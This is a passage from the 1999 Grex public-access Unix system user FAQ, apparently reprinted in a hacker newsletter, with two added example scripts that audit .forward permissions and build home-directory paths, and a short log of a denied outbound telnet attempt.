  o Bots (for IRC or anything else)
  o Graphical web page hosting
  o A place to store files

  And there are a few things you can only do if you are a member (who has made a donation and sent ID). These are:

  o Vote in Grex elections.
  o Serve on the board of Cyberspace Communications.
  o Access telnet, ftp, and irc sites from Grex.
  o Access web sites running on unusual ports, via lynx from Grex.

* What operating system is Grex running?

  Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not Linux, but it is Unix, so in many ways it is similar to Linux. There are a lot of details about Grex's configuration available in the Grex staff notes on the web: http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and software.

----------------------------------------------------------------------------

Conferencing

* What is "computer conferencing?"

  A computer conference is an area set aside for discussion on some general topic, such as computers, politics, or gardening. In such an area, people can read what other people have posted, and can introduce new subtopics or add responses to existing ones. On many systems, conferences are called "forums". Grex has many conferences. For a complete list, see http://cyberspace.org/cgi-bin/bt/pistachio/conflist.

* How can I participate in Grex's conferences?

  Grex's conferences are accessible by a text-based terminal interface or by the World Wide Web.
  To access the text-based interface, either dial direct or telnet to Grex
  and run the "bbs" command. (This command is run automatically every time
  you log in if you choose the "bbs shell" when you create your account.)

  World Wide Web access is provided by Grex's "Backtalk" conferencing
  software. Please see http://cyberspace.org/backtalk.html for details on
  using Backtalk.

----------------------------------------------------------------------------

Governance

* How is Grex governed?

  Cyberspace Communications functions as an online democracy, with
  policies set by its users. The Co-op Conference is open to all users and
  provides a forum for discussing policy issues. The Board of Directors,
  elected by the members, is the formal governing body and uses consensus
  in the Co-op Conference as its primary guide for making decisions. Any
  member of Grex who can attend the monthly meetings, held in Ann Arbor,
  Michigan, is eligible to run for the Board of Directors. In addition,
  any member can call a binding vote by the membership on any policy
  issue. The Articles of Incorporation and Bylaws can be viewed online.

* How can I participate in Grex governance?

  Any user can have a voice in Grex governance by joining the Co-op
  conference and participating in the discussions there. If you wish to
  be eligible to vote in Grex elections and to run for the Board of
  Directors, you can become a Grex member. Membership dues are US$6/month
  or US$60/year. To find out how to make membership payments, please see
  http://cyberspace.org/member.html. Membership donations are Grex's
  primary source of financing.

* Can I pay for membership by credit card?

  Unfortunately, no. Grex has investigated the possibility of accepting
  memberships by credit card, but the setup cost and monthly charges that
  we would have to pay to the bank are too high for us to pay. We do
  accept personal checks in US funds drawn on a US bank, US currency (not
  recommended to send by mail), and international money orders.
----------------------------------------------------------------------------

How do I ... ?

* How do I change my name, my shell, my mail forwarding, my password, or
  my terminal type?

  You can change any of these properties of your account with the "change"
  command. If you are using a menu or if you are at a bbs (Ok) prompt,
  type "!change". If you are in lynx, type "!" (an exclamation point) to
  get to a shell prompt first. At a shell prompt, type "change" and follow
  the menu-based instructions.

* How do I change my login ID?

  You can't change it. Instead, you have to create a new account with the
  login ID that you wish. Once you have done that, you can copy the files
  that you need from your old account to your new one. When you no longer
  need your old account, you can ask to have it deleted by sending a
  request from your old account to staff@cyberspace.org.

* How do I set up a web page?

  There is a completely separate FAQ for all questions related to the Grex
  web server. Please see http://www.cyberspace.org/local/grex/wwwfaq.html.

* How do I run irc?

  Unless you are a paying member, you can't use IRC because the protocol
  is blocked for free accounts. For more detailed information about this,
  see the Grex Eggdrop Page from the Grex Staff Notes. If you are a guest
  user, you cannot access IRC. You can chat on-line within the Grex
  community by using "party" (see chatting, below). Paying members just
  need to type "irc" to run the ircii client program, which is installed
  for this purpose.

* How do I chat with others?

  Grex has six ways of chatting:

  o 'party' is a chat program that many people can run at once.
  o 'write' sends text to the other person's screen one line at a time.
  o 'chat' is like 'write' but it sends one character at a time.
  o 'tel' is like 'write' but it sends only one line and then stops.
  o 'talk' splits the screen in half, so both people can type at once.
  o 'ytalk' is like talk but can accommodate more than two people.
* How do I find out who is waiting to log in?

  You can't find which accounts are waiting. People don't log in until
  after they get out of the telnet queue, so the system doesn't actually
  know who the people in the queue are. You can get some amount of
  information about who is in the queue. The command:

      fixwait -l

  will give you a list of the IP addresses that people on Grex are coming
  from, including people in the queue. If your friend has a unique IP
  address, you may be able to recognize it in the list.

* How do I get out of vi?

  vi (pronounced vee-eye) is a powerful text editor, but it has a steep
  learning curve at first. You can usually tell that you are in vi when
  you have a vertical line of squiggles (tildes) on the left of your
  screen. If you are trapped in vi, remember to type the escape key and
  then :q! (colon-q-exclamation point) followed by a return. The pico
  editor is a much friendlier editor for less experienced users.

* How do I access Usenet news?

  Grex does not maintain its own base of Usenet news, because this
  requires too much space and too much of our internet link. So there is
  no usenet client program on Grex. However, you can access Usenet via the
  "lynx" web browser. Just connect to http://dejanews.com/.

* How do I run X-windows?

  Grex does not support graphical interfaces such as X-windows. This
  service requires many more resources than the text-based service that
  Grex provides. It would use far too much CPU time and bandwidth for Grex
  to be able to support it.

* How do I restore a lost file from a backup tape?

  We can't do that. We just don't have time. Grex makes regular backups
  onto tape, but this is an enormously time consuming process. The purpose
  of these backup tapes is to protect the system from disaster.
  Unfortunately, there is not enough time to honor requests from
  individual users to restore files from these tapes. Grex is not a good
  place to keep any file that you cannot afford to lose.
  If you have an important file on Grex, it is your responsibility to keep
  a backup of it on your own computer.

* How do I get a list of Unix commands?

  There are so many Unix commands that we recommend that users who are not
  familiar with Unix use the "menu" command to explore Grex. The most
  common commands are available there. If you really want a list, then run
  the Grex command "listcommands" to print a list of most Unix commands on
  Grex. (Built-in shell commands are not included.) This will take a long
  time to run.

* How do I use Unix commands?

  The Unix operating system is amazingly powerful and flexible, with
  thousands of commands. Unix can be a challenge to get started with, but
  if you are interested in learning Unix, Grex is a good place to start,
  since we do give you access to almost all commands. For a good
  introduction to basic Unix and VI usage, see Christopher Taylor's witty
  tutorial Unix is a Four Letter Word, or the University of Edinburgh's
  UNIXhelp for Users pages. Jennifer Myers has a good page of Unix links
  at the UNIX Reference Desk. Online reference information about most
  commands can be called up via the "man" command. For example, for
  information about the date command, type

      man date

----------------------------------------------------------------------------

Accounts and Passwords

* Why do numbers appear before the login prompt?

  If you are telnetting to Grex when it is full, you must wait in a queue
  for a free port to telnet into. These numbers are telling you your place
  in line. There usually is no queue in the evenings in the eastern US and
  on weekends.

* Why do I get a login prompt after I log out?

  This is in case there is a queue. It permits you to log in without
  waiting through the queue a second time. It is safe to disconnect when
  you are at the login prompt, or you can type "bye" or "exit" and Grex
  will disconnect.

* Why does it say my new password is too obvious?

  Probably because it is too short, or only has lower case letters.
  It is important that internet vandals not be able to guess your
  password. Therefore, the Grex password change program is very particular
  about what it will accept. It is a good idea for your password to have
  at least 9 characters, at least one of which is an upper case letter,
  and at least one number or punctuation character embedded in it. Try the
  "genpass" program for some random passwords.

* Why does it say my password is expiring?

  For security reasons, you should not keep the same password for too
  long. Grex passwords expire when they have not been changed for a whole
  year. All you have to do is run the "change" program to change your
  password, and you will stop getting nagged when you log in. Please
  remember to write your new password down when you change it, so you
  won't forget it.

* Grex said, "3 failures since last login," when I logged in. What does
  this mean?

  When someone tries to log in to your account but does not know the
  password, Grex keeps count of failed login attempts. In general, if there
  are only two or three of them, it probably means someone made a typo at
  the login prompt. This happens most often for accounts with very short
  user IDs and those with popular names, such as "ken". Less commonly,
  login failures may occur when someone runs telnet with the option to
  pass along the account name from another system. If it is a different
  account name, but matches yours, this will produce a failed login
  attempt for your account every time this person telnets to Grex. If
  there are 25 or 30 failed login attempts, or if the last successful
  login to your account wasn't yours, then it could mean that someone is
  trying to break in to your account. In general, most failed login
  attempts are from other people's typing errors and are not malicious.
  If you still suspect malicious activity, change your password (don't
  forget to write it down) and let the staff know so that they can
  investigate.

* I can't remember my password. What do I do?

  Contact the Grex staff.
  Send mail from another site if you have access to email at another
  site. Send messages about access problems to staff@cyberspace.org.
  Remember to specify which account is the one you lost the password for.
  You can also log in to Grex as "trouble" without a password, which will
  send a message to the staff. Be sure to provide a postal address, an
  e-mail address, or a local telephone number, so that the staff can
  contact you in return.

* I have a Grex account. Why do I get "No such loginid?"

  This means that your account has been deleted. Accounts on Grex are
  deleted if no one logs in for more than 3 months. There is not enough
  room on Grex to keep old unused accounts. To avoid losing your account,
  you should log in every month or two. Accessing your web page, or having
  your mail get forwarded, does not count, but conferencing over the web
  using your account and password in Backtalk does count as logging in for
  this purpose. If your account has been deleted, it usually cannot be
  recovered or restored. Please feel free to recreate the account.

* I don't want to use my account anymore. How do I get it deleted?

  If you don't want to wait until your account expires, you have to log in
  one last time and send a message to staff@cyberspace.org from the
  account that you want deleted. In your message, ask for it to be
  deleted.

* Why can't I enter control-C when I am creating my account?

  When creating an account by telnet, you are asked to provide the
  characters you wish to use for various purposes. People using Macintosh
  NCSA Telnet have experienced the behavior that when they type ^C, the
  program exits rather than accepting the ^C as the designated control
  character. This is caused by undesirable preferences within that
  program and is easy to fix. Look at the "Session" menu, at the "Setup
  Keys" menu item (or hit command-S). You will probably find that you have
  a setting for "interrupt process" which is set to ^C.
  If so, NCSA Telnet is honoring this setting and sending the "interrupt
  process" signal (part of the time-worn telnet protocol) whenever you
  type ^C. Blank this setting out and then save your telnet set in a file.
  If you start telnetting by double clicking on the saved settings, you
  won't have to remember to clear it each time.

----------------------------------------------------------------------------

E-Mail

* How do I get Grex to forward my mail to another site?

  Use the "change" command. Just type "change" at a shell prompt or
  "!change" at any other prompt. This will invoke a menu that allows you
  to change almost any setting on your account, including the mail
  forwarding option. There are certain restrictions on the use of
  forwarding, so make sure you are following the rules.

* I set up .forward myself. Why doesn't it work?

  Probably because it is not world readable. .forward files must be world
  readable in order to be valid on Grex. If you are looking for a way to
  forward your mail to an anonymous place, you need to find an anonymous
  remailer system. Grex doesn't do this. To make your .forward file world
  readable, change to your home directory (type: cd) and then issue this
  command:

      chmod 644 .forward

  Your home directory must also be world accessible; type:

      chmod 755 .

  or use 711 instead of 755 if you don't want other people to be able to
  scan your directory.

* How can I hide my forwarding address?

  You can't. If you have forwarding enabled, the address must appear in
  the finger command. There is no way to hide the address that you are
  forwarding to. Grex does not wish to provide anonymous remailing
  services. You may wish to make use of one of the anonymous remailers
  listed on the Yahoo page
  http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_Mailers/

* How do I read mail with Netscape or Eudora?

  You can't. Those are POP clients, and Grex doesn't run a POP server.
  This is because Grex is intended to be an on-line community, and having
  a POP server would encourage people to use Grex as a mail drop instead,
  never logging on, and so never having a chance to become part of the
  Grex community. You must log in to Grex in order to read your mail.

* My mailbox is getting heavily spammed. What can I do?

  Spam (unwanted mail) is unfortunately very common on the internet.
  Grex's mail transport system has numerous filters to reduce spam, but it
  does not eliminate it. The Grex staff may or may not be able to help you
  reduce the spam you are getting. The proper way to report spam is to
  forward a copy of one of the offending messages to abuse@cyberspace.org.
  Do not send multiple messages. The message you send MUST be accompanied
  by the full mail headers, so that we can determine its true origin. The
  origin of spam is often hidden, and may require detailed examination of
  these headers. If you use pine, you can view these headers with the "H"
  command.

* Why is mail that I send to Grex getting rejected?

  This usually happens when the sending site is not configured properly.
  Problems in mail configuration can often lead to mail that has an
  invalid return address. Grex's mail system tries very hard to detect
  and reject invalid sending addresses, in order to reduce the amount of
  spam (unwanted mail) on Grex. If your mail looks like spam, then Grex
  will reject it. If you think this is happening to your legitimate mail,
  send a rejected copy of it to grex-staff@pmtech.com, and be sure to
  include all of the mail headers. Other common reasons for mail to Grex
  to be rejected are that it may be too large (over 100k) or your mailbox
  may have grown too large (over 600k). Mail will be rejected in these
  cases.

* Why does pine say that it cannot open my mail folder?

  Actually, that is probably just a faulty error message. For new
  accounts, it only means that you haven't received any mail yet. Once you
  receive some mail, the message should go away forever.
  We are working on getting rid of this error message.

* How do I get pine to save my outgoing mail?

  This feature is turned off on Grex by default, because lots of new users
  were accumulating vast files of old mail without ever knowing that they
  were doing it. You're quite welcome to create the folder, as long as you
  keep an eye on your disk usage so that you don't exceed Grex's 1
  megabyte limit for your account. To create your saved-mail folder, go
  into the pine configuration screen and look for the setting for
  "default-fcc". Set it to "saved-mail" or whatever name you would like to
  use. You need to use quotation marks around the file name.

* How do I send attachments?

  Please do not send large attachments. If you have a small one, so that
  your mail remains under 100 K bytes in size, then you can send
  attachments from Grex. Once the file is in your home directory on Grex,
  then when composing a message in pine, put the file name on the
  attachments line. Please remember to delete the file after sending it as
  an attachment, so that you do not fill up your allotted disk space.

* How can I view an attachment file named myfile.doc?

  Any file that ends with ".doc" is probably a Microsoft Word file. There
  is no way to view such a file on Grex. You will have to download that
  file to a computer that has Microsoft Word or some other word processor
  that can import such files.

* How can I set the "From" header in pine for my outgoing mail?

  In Pine on Grex, you can't set the "From:" field. This is disabled
  because there were too many problems with people setting invalid
  addresses, which caused their outgoing mail to bounce to the postmaster
  whenever it was undeliverable.

* How do I set up a mailing list here?

  You can't. We're sorry, but this is not permitted. You can only forward
  mail to a single site elsewhere on the internet. Mailing lists are too
  resource intensive for Grex to support. You may wish to try using an
  advertising-based free mailing list service.
  The Free Center maintains a rated list of free mailing list providers.

* Is it OK to collect my mail by FTP?

  Yes, but you must do it correctly. It is extremely risky to attempt to
  transfer your mail spool file directly off of Grex by FTP. You risk
  losing some or all of your collected mail, because the FTP daemon does
  not participate in the locking scheme used by the mail delivery programs
  on Grex. In addition, your account may appear to be abandoned because
  FTP connections do not update the date of last login. This could result
  in loss of your account if it is the only way you use Grex. Instead, we
  recommend telnetting to Grex and running a mail client program. These
  all do participate in the locking mechanism for the mail spool. Collect
  all of your mail into a file in your home directory, and then log out.
  You may now safely fetch that file in your home directory by FTP. Please
  remember to delete it once it has been safely transferred.

* Why can't I get procmail to work?

  Procmail is a mail filtering program, but it stopped working when Grex
  reorganized its mail system to use hierarchical mail directories. Grex
  really needs to have the mail organized hierarchically because of the
  very large number of users receiving mail. We hope to see procmail
  restored some day, but at the moment it is broken, and no schedule has
  been established for correcting it.

* Can I set up an autoresponder to answer my mail while I am away for a
  while?

  Yes. Try the vacation program. The instructions can be found by typing
  "man vacation".

----------------------------------------------------------------------------

Dialing In

* How can I dial into Grex?

  The short answer is to dial (734) 761-3000 with your terminal software
  set to 8-N-1. This process is described in detail in Grex's dial-up
  access information page.

* If Grex doesn't answer the phone, how many times should I let it ring?

  We try very hard to keep all of the modems working properly, but
  sometimes you may encounter a failure.
  Grex's phone lines are all configured so that if one modem doesn't
  answer after 3 rings, you are automatically transferred to the next line
  in the trunk hunt. If there happens to be a stuck modem, you need to
  wait at least 4 rings before a second one gets a chance to work. If
  there are two bad modems, then 7 rings are required.

* If I can't get on by calling (734) 761-3000, is there another number I
  can try?

  No. Grex used to publicize other numbers in the interior of the hunt
  group, but there is no longer any advantage to calling any other number,
  because of this automatic stepping feature. Even if Grex is down, the
  phone should pick up once it steps past any bad modems. If it is down
  for an extended period, you should receive a short explanation from the
  terminal server. If the terminal server has failed, or the power to
  Grex's building has failed, the phones will not answer, but these
  conditions are very rare.

* Why can't I get file transfer to work except for small files?

  Probably because you don't have a modem cable that is capable of
  handling hardware flow control, or your modem doesn't support it or has
  the feature turned off.

----------------------------------------------------------------------------

Privacy, Encryption, and Security

* My personal information should be private. Why is it shown?

  When you look up your own user information, you can always see it, even
  if it is set up so that nobody else on the system can see it. To see
  what other people see, ask for the info about
  "youraccount@cyberspace.org" instead of just "youraccount".

* How can I keep private the place I'm logged on from?

  This is considered public information on Grex. The only way to hide it
  is not to log on.

* I am receiving unwanted chat requests. What can I do?

  You can adjust the chat settings for your account with the "change"
  command. To run it, type "change" at a shell prompt, or "!change" from a
  menu or from PicoSpan. Then choose "W) Write settings" and follow the
  menus from there.
  You can turn off all chat requests, accept all chat requests, or select
  which users can and cannot chat with you.

* How can I view my friend's files?

  Grex is a very open system, so directories are open to the public unless
  the owner decides to make them private. E-mail, however, is
  automatically saved in private files that the world cannot see. To
  permit a file so that it can be seen by others, type

      chmod a+r file-name

  To permit a directory, type

      chmod a+rx dir-name

  To hide a file or directory from everyone but yourself, type

      chmod go-rx file-or-dir-name

  If you hide your home directory completely, neither mail forwarding nor
  web hosting will be available to you. You may make your directory
  accessible without allowing it to be scanned. This is how:

      chmod 711 dir-name

* Can I run PGP on Grex to protect my e-mail messages from being seen by
  others?

  No. PGP is not available on Grex for a number of reasons. The two most
  compelling reasons are that it would not be legal, and it would not
  offer you the protection you seek. We would like to see it be legally
  available to all, but in order to be effective, PGP must be installed on
  your own computer, not on Grex. Encrypting or decrypting a message on
  Grex would mean that the message would have to travel over an insecure
  network in plaintext before encryption or after decryption, and this is
  not the way to protect your message. In order to install PGP on your
  home computer, North American users should go to the MIT PGP
  Distribution Site at http://web.mit.edu/network/pgp.html, and all other
  users should use the international PGP home page at
  http://www.ifi.uio.no/pgp/.

* Do you provide secure shell?

  Yes, we do. Secure shell (ssh) is a good way to connect because your
  session is encrypted, so that passwords cannot be intercepted by
  sniffers. Unfortunately, it is not fully functional on Grex, because the
  ssh daemon is unable to wait in line with telnet users when there is a
  queue, so ssh connections will fail when the system is full.
  You may see a message like this when it fails:

      Warning: no access to tty (Bad file number).

  When there is no queue you can use ssh to connect to Grex without any
  trouble.

----------------------------------------------------------------------------

Programming

* How do I compile a program?

  To compile a C program named foo.c, type

      gcc foo.c -o foo

  This compiles foo.c and creates an executable program named foo. To run
  it, type

      ./foo

  Likewise, to compile a C++ program named foo.cpp, type

      g++ foo.cpp -o foo

  Please check with the Grex staff before compiling programs you bring in
  from the net. Most of the useful programs are already installed here,
  and many others will not run on Grex, but compiling them on Grex wastes
  a lot of bandwidth and cpu time, resources that Grex is short on.

* Why can't I get the C compiler to compile my program?

  Probably you are using the wrong C compiler. Grex has two compilers
  installed. cc is only used for building certain system executables. It
  is not ANSI standard, and it lacks certain standard include files. You
  need to use gcc instead. This is a fairly recent version of the Gnu C
  compiler. It is ANSI standard and very complete.

* I compiled my program. Why won't the system run it?

  Usually this is because the program is not on your path. Unlike a DOS or
  Windows system, on Unix the current directory is not automatically
  placed on your path. So if you compile a program named foo, you cannot
  run it by just typing "foo". You need either to place the executable
  somewhere on your path, or to precede its name with ./ (dot-slash), so
  you would type "./foo".

* Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?

  No. These are all servers, daemons, or programs that remain running
  after you have logged out. No program run by users is allowed to run
  after you log out. See the Grex Eggdrop Page from the Grex Staff Notes.
  At one time or another, the possibility of our installing some of these
  as official services has been discussed in the "coop" conference. We
  have never yet decided to do so, but if you are interested in pursuing
  this possibility, the Grex coop conference is the place to make your
  request.

* Can I have a copy of Grex's newuser program?

  Yes, you can find out more about newuser, including availability, on
  this web page: http://www.cyberspace.org/~mdw/newuser.html.

* Can I have a copy of Grex's write/chat/tel programs?

  Yes, you can find out more about write/chat/tel, including availability,
  on this web page: http://www.wwnet.net/~janc/write.html.

* Can I have a copy of Grex's party program?

  Yes, you can find out more about party, including availability, on this
  web page: http://www.wwnet.net/~janc/software.html.

----------------------------------------------------------------------------

Miscellaneous

* Why does my browser say "Can't find application" when I click on the
  "Telnet In" link?

  You need to configure your browser to find your telnet application
  program. The exact instructions for doing this vary widely depending
  upon both your operating system and your browser. In Netscape 3 this
  setting can be found in "Options"/"General preferences"/"Applications".
  Select the telnet application that came with your system, or one you
  downloaded from the internet. For more details about telnet
  applications, see the Grex Telnet Information page at
  http://www.cyberspace.org/telnet.html.

* When I try to telnet to Grex, it hangs. Why can't I connect?

  There are several things that can go wrong.

  o You don't have DNS working properly. In this case you can connect to
    Grex by using its IP address. See below.
  o You are accessing the net via a firewall which blocks telnet. In this
    case you need to contact your security administrator for the LAN
    which you are accessing the net from, and ask if there is a way to
    telnet through the firewall.
  o Your telnet client is not working properly.
    You would not be able to telnet to any other site, either. Have you
    tried any? Try telnetting to hvcn.org and see if you get a login
    prompt.
  o Grex is down. This happens occasionally. You can usually tell if Grex
    is down by trying to access the web site. Try reloading to eliminate
    the possibility of a cached page. This won't be a good test if your
    connection uses a caching proxy server.
  o If it is none of the above, send mail to The Grex Staff and explain
    everything you tried, and also please specify the IP address and the
    GMT time that your attempt failed. If you can provide the results of
    a ping or traceroute from your end, that may prove to be helpful,
    too.

* Can I do a ping or traceroute from Grex?

  These tools are not available on Grex. Vandals were using them to attack
  other sites. This is a ludicrous thing to do from Grex, because Grex is
  so tiny that its CPU and net connection become overloaded long before
  any other system would even begin to notice that it was being attacked.
  But people were doing it anyway, and hurting Grex. Regrettably, the
  actions of a few thoughtless people have forced Grex to disable these
  potentially valuable network analysis tools. You may be able to use a
  remote traceroute server on the web. See http://www.traceroute.org/.

* What is Grex's IP address?

  At the time this answer was last updated, the IP address of Grex was
  204.212.46.130. IP addresses may change at any time. In general we have
  little control over changes to our IP address. You should always use
  the hostname, because if the IP address does change, the DNS (Domain
  Name Service) lookup of the hostname should produce the new IP address.
  If you are unsure whether a problem is due to DNS, you can test to see
  if you can connect using our IP address. However, if you can, it is
  strongly recommended that you resolve the problem you are having with
  DNS, so that you do not have to rely on inherently unreliable IP
  addresses.
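The .forward recipe in the E-Mail section and the chmod recipes in the
Privacy section above are two sides of the same problem on a shared host
like Grex: the mailer needs a world-readable .forward inside a
world-searchable home directory, and everything else that is world-readable
can be read by every other shell account on the machine. The script below
is an added example written for this issue; it is not part of the Grex FAQ
and not one of Grex's own tools. It assumes a POSIX sh and a find(1) that
accepts octal -perm masks, and takes the home directory as an argument. The
function names check_forward, fix_forward and list_world_readable are this
example's own.

```shell
#!/bin/sh
# Added example, not part of the Grex FAQ: audit the permissions the FAQ
# says are needed before ~/.forward is honoured, repair them with the FAQ's
# two chmods, and list what else in the home directory is readable by every
# other shell user on the host.  Function names are this example's own.

# other_can MASK PATH: succeed if PATH has every bit of the octal MASK set
# (004 = others may read, 001 = others may search/execute).  find(1)'s
# "-perm -MASK" is used instead of stat(1), whose flags differ between GNU
# and BSD systems.  -prune stops find from descending into a directory.
other_can() {
    [ -n "$(find "$2" -prune -perm -"$1" -print 2>/dev/null)" ]
}

# check_forward HOME: print one line per problem.  Exit status 0 if the
# .forward would be honoured, 1 if a chmod is needed, 2 if there is none.
check_forward() {
    cf_home=$1
    cf_status=0
    if [ ! -f "$cf_home/.forward" ]; then
        echo "no .forward in $cf_home"
        return 2
    fi
    if ! other_can 004 "$cf_home/.forward"; then
        echo "$cf_home/.forward is not world-readable (chmod 644 .forward)"
        cf_status=1
    fi
    if ! other_can 001 "$cf_home"; then
        echo "$cf_home is not world-searchable (chmod 711 .)"
        cf_status=1
    fi
    return $cf_status
}

# fix_forward HOME: apply the FAQ's chmods.  711 rather than 755 for the
# directory: the mailer can still open .forward by name, but nobody can
# list the directory to discover what else is in it.
fix_forward() {
    chmod 644 "$1/.forward" && chmod 711 "$1"
}

# list_world_readable HOME: every regular file under HOME that "others" can
# read, i.e. what any other account on the machine could cat.  Files you
# serve as web pages are expected to show up here; a saved-mail folder
# or a private notes file is not.
list_world_readable() {
    find "$1" -type f -perm -004 -print 2>/dev/null | sort
}

# Command-line use:  sh forward_audit.sh "$HOME" [fix]
if [ -n "$1" ]; then
    if check_forward "$1"; then
        :
    elif [ $? -eq 1 ] && [ "$2" = fix ]; then
        fix_forward "$1" && echo "fixed, rechecking:" && check_forward "$1"
    fi
    echo "world-readable files under $1:"
    list_world_readable "$1"
fi
```

Run it read-only first; the "fix" argument only ever loosens .forward to
644 and sets the directory to 711, so a home directory that was 700 becomes
searchable but still not listable, and nothing else is touched.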
* Why does the "who" command show numeric IP addresses for some users?

  That is because this information is stored in a file (utmp) which only
  permits 16 characters of storage for this information. If the IP
  address exceeds 16 characters when converted to text form, then it is
  stored (and reported) only in its numeric form. This affects other
  commands besides the "who" command, such as the "finger" and "last"
  commands.

* How much disk space can I use and how can I determine how much I am
  using?

  We ask folks to keep their disk usage under a megabyte. You can find out
  how much disk space you are using (in kilobytes) by running the
  following command in your home directory:

      du -sk

  The number that comes back is the number of kilobytes of disk you are
  using. If you are using more than 1024, please remove files. If you are
  thinking of putting something big in your account, please talk to the
  Grex staff (staff@cyberspace.org) first. There aren't many good reasons
  to put big things in your Grex account: Grex doesn't allow multimedia
  files on its web pages (not even gifs and jpegs), and most of the useful
  programs that will actually run on Grex are already installed on Grex.
  So please talk to the staff first.

* Why doesn't my arrow key work, so I can edit previous commands in sh?

  This is because Grex is running a real sh, and that is a feature not
  supported by sh. What some Unix systems call sh is actually bash, an
  enhanced version of the sh shell which does this. If you would like to
  use bash instead, you should change your shell on Grex to bash. You can
  do that by running the change command.

* Why can't I edit previous commands in tcsh? It is supposed to support
  it.

  Tcsh does support previous line editing. Emacs conventions for
  command-line editing are the default at most sites, though Grex uses vi
  as the default for command-line editing.
  So you have two options. If you are handy with vi, hit escape to jump
  into command mode, then start editing your line as you would with vi.
  The second option is to type

      set -o emacs

  at the prompt. After that, you should be able to edit your command line
  in a way that is familiar to you. If you prefer to always use emacs as
  your command-line editor, then you'll want to place the "set -o emacs"
  line in your .login file.

* Why does the last line of each page of text disappear from the screen
  before I can read it?

  This happens when Grex doesn't know how many rows of text are on your
  screen. The easiest way to set this correctly is to run the "change"
  program on Grex. It will count rows for you and display the correct
  number at the top of your screen (sometimes it can take some fiddling to
  figure out whether your screen has 48 or 49 or 50 rows), and make the
  necessary changes to your startup files so that your settings will be
  right in the future. To run the change program, type "change" at a
  shell prompt, or "!change" from a menu or PicoSpan. Then select "change
  terminal type" and follow the menus from there.

* Why do the bottom lines stay on the screen in the editor while the rest
  scroll normally?

  Same problem. Wrong number of lines in the setting. See solution above.

* Why doesn't "screen" work when I disconnect from Grex?

  Grex runs a special daemon that kills all user processes when a user
  logs out. This prevents users from running servers or robots of any
  kind. It also prevents them from using the reconnect feature of screen
  (although the other features work fine). The reason for this policy is
  to prevent users from consuming our limited resources while not logged
  in.

* I found a huge core file in my account. What should I do?

  Nothing really. This is a file that gets created if a program fails
  (crashes). It is intended to help the programmer find whatever bug
  caused the failure. If not renamed, these files will be deleted
  automatically in a day or two.
You can delete it if you wish. By the way, a core file usually doesn't take up as much space on the disk as it appears to, because it is "sparse" (full of empty space).

* How does the system decide where to put my home directory?

Grex uses a hierarchical arrangement of home directories to keep the directory sizes from growing too large and thus becoming inefficient. So, on Grex, home directories are always located by a path of this form:

    /x/y/z/username

The x is the disk letter, the y is the first letter of the username, and the z is the second letter of the username. Currently we have two disks that user accounts occupy, /a and /c (/b was not available). When we add a third disk, some users will be assigned on /d. The choice of disk is determined when your account is created, and this choice is switched back and forth manually by the staff to keep the available disk space balanced.

The environment variable $HOME should always be set to the full path of your home directory. The ~ symbol may also be used as a shorthand for your home directory, as long as your shell supports it. (The Bourne Shell does not.)

* Where can I get a self-contained multi-user chat program for my linux box?

You might want to try out Grex's party program. See the Party Question in this FAQ.

* I know something about Unix. How can I help the Grex staff?

We are always delighted to have new volunteers. One of the things that Grex needs most urgently is more people to answer "write help" requests. It is recommended that you check out the helpers conference. To turn on your helper flag, run the Unix command "mesg -h y". Also you should read the Grex Staff Note on the topic of volunteering to be on the Grex staff.

----------------------------------------------------------------------------
Last updated January 17, 1999 (srw)

> telnet 24.x.x.x
Sorry!

You need to be a *validated member* of Grex to use outbound internet services, including ftp and telnet, to connect to anything other than Grex itself.
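The home-directory layout described above, as an added example that is not Grex's own code: home_path builds /x/y/z/username from a username and disk letter, split_home_path verifies that an existing path actually obeys the layout (a cheap sanity check for mis-created or tampered accounts), and directory_fanout shows how usernames spread over the two-letter buckets, which is the reason the FAQ gives for the hierarchy. The username rule (lowercase letters and digits, at least two characters, so both letter components exist) and the sample usernames are assumptions the FAQ does not state.

```python
import string

# Disks the FAQ says currently hold user accounts; /b is not available.
ACCOUNT_DISKS = ("a", "c")

# Assumption (not from the FAQ): usernames are lowercase alphanumerics of at
# least two characters, so the y and z path components always exist.
USERNAME_CHARS = set(string.ascii_lowercase + string.digits)


def home_path(username, disk):
    """Build the Grex-style home directory path /x/y/z/username.

    x is the disk letter, y the first letter of the username, z the second.
    """
    if disk not in ACCOUNT_DISKS:
        raise ValueError(f"no user accounts on disk /{disk}")
    if len(username) < 2 or not set(username) <= USERNAME_CHARS:
        raise ValueError(f"unsupported username {username!r}")
    return f"/{disk}/{username[0]}/{username[1]}/{username}"


def split_home_path(path):
    """Inverse of home_path: recover (disk, username) and check consistency.

    Rejects anything that does not obey the layout, e.g. a username that sits
    under the wrong letter directories or on a disk with no accounts.
    """
    parts = path.split("/")
    if len(parts) != 5 or parts[0] != "":
        raise ValueError(f"not a Grex home path: {path!r}")
    _, disk, _first, _second, username = parts
    # Rebuilding the path from its own components catches every mismatch.
    if home_path(username, disk) != path:
        raise ValueError(f"path does not match layout: {path!r}")
    return disk, username


def directory_fanout(usernames, disk):
    """Count how many home directories land in each /x/y/z bucket.

    Illustrates why the two-letter hierarchy keeps any single directory small.
    """
    counts = {}
    for user in usernames:
        bucket = home_path(user, disk).rsplit("/", 1)[0]
        counts[bucket] = counts.get(bucket, 0) + 1
    return counts


if __name__ == "__main__":
    # Constructed usernames, not real Grex accounts.
    sample = ["alice", "alan", "bob", "al", "carol"]
    for user in sample:
        print(home_path(user, "a"))
    print(directory_fanout(sample, "a"))
```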
To find out how to become a *member*, type "support" (without the quotes) at almost any prompt, or !support at the telnet or ftp prompt.

To become a *validated* member, either pay for your membership with a personal check, or include a photocopy of a driver's license or other official ID along with your membership payment, or send mail to aruba (Grex's treasurer) to work out some other way of identifying yourself.

Membership costs $6/month - cheap!

Grex has lots of options that are available to non-members. Try typing "bbs" to join the conferences, or "menu" or "lynx" for two different menu systems that help you to find many options that you *can* use.

If you have questions about Grex, you can find answers by joining the Info conference. (Type "bbs info" to get there). Or send mail to "staff".

Thanks for trying out Grex!

Trying x.x.x.x ...
telnet: connect: Permission denied
/usr/local/grex-scripts/.inet_real/telnet> quit
> exit
logout

@HWA

10.0 Shamrock Says it Was All A Lie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pulling the SHAM out of SHAMrock...

